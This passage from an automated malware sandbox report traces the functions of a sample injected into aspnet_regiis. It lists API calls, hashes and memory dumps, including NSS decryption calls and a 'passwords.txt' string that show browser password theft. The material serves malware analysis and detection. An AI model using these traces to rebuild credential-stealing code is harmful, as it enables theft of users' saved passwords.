                                                                                                                                                                              • Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00
                                                                                                                                                                              Function 02A1859A Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                              • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                                                                                              • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                              • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                                                                                              Function 02A0148A Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                              • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                                                                                              • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                              • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                              Function 02A014A2 Relevance: .0, Instructions: 3COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                              • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                                                                                              • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                              • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                                                                                                                              Function 02A0DCA0 Relevance: 90.4, APIs: 60, Instructions: 399memorystringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A0DB7F: lstrlen.KERNEL32(?,76DD5460,?,00000000), ref: 02A0DBBB
                                                                                                                                                                                • Part of subcall function 02A0DB7F: strchr.MSVCRT ref: 02A0DBCD
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,76DD5460,?,00000000), ref: 02A0DD04
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DD0B
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DD20
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DD27
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DD43
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DD55
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DD62
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A0DD93
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DD9A
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02A0DDA1
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DDA8
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DDBD
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DDC4
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DDDA
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DDEC
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DDF3
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A0DE11
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DE18
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02A0DE1F
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DE26
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DE3B
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DE42
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DE52
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DE64
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DE6B
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A0DE93
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DE9A
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02A0DEA1
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DEA8
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DEC3
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DECA
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DEDD
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DEEF
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DEF6
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0DEFF
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 02A0DF15
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DF1C
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0DF34
                                                                                                                                                                                • Part of subcall function 02A0F128: std::_Xinvalid_argument.LIBCPMT ref: 02A0F13E
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DF75
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 02A0DF9B
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DFA8
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0DFAD
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000001), ref: 02A0DFBC
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0DFC3
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DFD7
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0DFDE
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0DFEC
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0DFF9
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0E000
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0E035
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0E03C
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02A0E043
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0E04A
                                                                                                                                                                              • strcpy_s.MSVCRT ref: 02A0E065
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0E077
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0E07E
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0E122
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0E129
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0E173
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0E17A
                                                                                                                                                                                • Part of subcall function 02A0DB7F: strchr.MSVCRT ref: 02A0DBF2
                                                                                                                                                                                • Part of subcall function 02A0DB7F: lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A0DCF7), ref: 02A0DC14
                                                                                                                                                                                • Part of subcall function 02A0DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0DC21
                                                                                                                                                                                • Part of subcall function 02A0DB7F: RtlAllocateHeap.NTDLL(00000000), ref: 02A0DC28
                                                                                                                                                                                • Part of subcall function 02A0DB7F: strcpy_s.MSVCRT ref: 02A0DC6F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$Free$Allocatestrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1704697717-0
                                                                                                                                                                              • Opcode ID: 8bfef40129e7dbe54aadd4eb4f5a8e3c60ef7a4da10dfe1c02dc1bbc6ac9c7cd
                                                                                                                                                                              • Instruction ID: b031fcb481ee9317cf313cc32d6f1ccf163c6e9c010cac4bb7be78d91390c94f
                                                                                                                                                                              • Opcode Fuzzy Hash: 8bfef40129e7dbe54aadd4eb4f5a8e3c60ef7a4da10dfe1c02dc1bbc6ac9c7cd
                                                                                                                                                                              • Instruction Fuzzy Hash: 4DE1F472C44218AFEF21AFF4AD88A9EBB79FF08300F1448AAF615B3151DE3595959F10
                                                                                                                                                                              Function 02A0A916 Relevance: 61.5, APIs: 34, Strings: 1, Instructions: 211stringmemoryfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A922
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,02A373A4,02A3680F), ref: 02A0A9C1
                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A9D9
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A9E1
                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A9ED
                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A9F7
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AA09
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AA15
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0AA1C
                                                                                                                                                                              • StrStrA.SHLWAPI(02A0B824,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AA2D
                                                                                                                                                                              • StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AA47
                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 02A0AA5A
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AA64
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373A8), ref: 02A0AA70
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AA7A
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373AC), ref: 02A0AA86
                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 02A0AA93
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,-00000010), ref: 02A0AA9B
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373B0), ref: 02A0AAA7
                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AAB7
                                                                                                                                                                              • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AAC7
                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 02A0AADA
                                                                                                                                                                                • Part of subcall function 02A0A7D8: _memset.LIBCMT ref: 02A0A815
                                                                                                                                                                                • Part of subcall function 02A0A7D8: lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A830
                                                                                                                                                                                • Part of subcall function 02A0A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 02A0A838
                                                                                                                                                                                • Part of subcall function 02A0A7D8: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A846
                                                                                                                                                                                • Part of subcall function 02A0A7D8: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A85A
                                                                                                                                                                                • Part of subcall function 02A0A7D8: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A89A
                                                                                                                                                                                • Part of subcall function 02A0A7D8: _memmove.LIBCMT ref: 02A0A8BB
                                                                                                                                                                                • Part of subcall function 02A0A7D8: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A8EC
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02A0AAE9
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373B4), ref: 02A0AAF5
                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AB05
                                                                                                                                                                              • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AB15
                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 02A0AB28
                                                                                                                                                                                • Part of subcall function 02A0A7D8: lstrcat.KERNEL32(02A36803,02A36807), ref: 02A0A8E5
                                                                                                                                                                                • Part of subcall function 02A0A7D8: lstrcat.KERNEL32(02A36803,02A3680E), ref: 02A0A8FB
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02A0AB37
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373B8), ref: 02A0AB43
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373BC), ref: 02A0AB4F
                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0AB5F
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0AB7D
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02A0ABAC
                                                                                                                                                                              • NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0ABB2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocateAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
                                                                                                                                                                              • String ID: passwords.txt
                                                                                                                                                                              • API String ID: 923042822-347816968
                                                                                                                                                                              • Opcode ID: bf8b5c8f4378d69002d4a1dd9e6653d5cb560fcd3d19df9a7c1a6780fd12cae8
                                                                                                                                                                              • Instruction ID: 22de47082a85a7b6e1819fba0b8099ee1e2e85c2cd22e6f7f6f1dae8b992e447
                                                                                                                                                                              • Opcode Fuzzy Hash: bf8b5c8f4378d69002d4a1dd9e6653d5cb560fcd3d19df9a7c1a6780fd12cae8
                                                                                                                                                                              • Instruction Fuzzy Hash: 26716231980325BBDB016FA4ED89E9E7B79EF49301B104A50FA01B3151DF74DAA5CFA2
                                                                                                                                                                              Function 6CC56E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6CB0CA30: EnterCriticalSection.KERNEL32(?,?,?,6CB6F9C9,?,6CB6F4DA,6CB6F9C9,?,?,6CB3369A), ref: 6CB0CA7A
                                                                                                                                                                                • Part of subcall function 6CB0CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CB0CB26
                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?,?,6CB1BE66), ref: 6CC56E81
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6CB1BE66), ref: 6CC56E98
                                                                                                                                                                              • sqlite3_snprintf.NSS3(?,00000000,6CCBAAF9,?,?,?,?,?,?,6CB1BE66), ref: 6CC56EC9
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6CB1BE66), ref: 6CC56ED2
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6CB1BE66), ref: 6CC56EF8
                                                                                                                                                                              • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC56F1F
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC56F28
                                                                                                                                                                              • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC56F3D
                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6CB1BE66), ref: 6CC56FA6
                                                                                                                                                                              • sqlite3_snprintf.NSS3(?,00000000,6CCBAAF9,00000000,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC56FDB
                                                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC56FE4
                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC56FEF
                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC57014
                                                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,6CB1BE66), ref: 6CC5701D
                                                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6CB1BE66), ref: 6CC57030
                                                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC5705B
                                                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,6CB1BE66), ref: 6CC57079
                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC57097
                                                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6CB1BE66), ref: 6CC570A0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
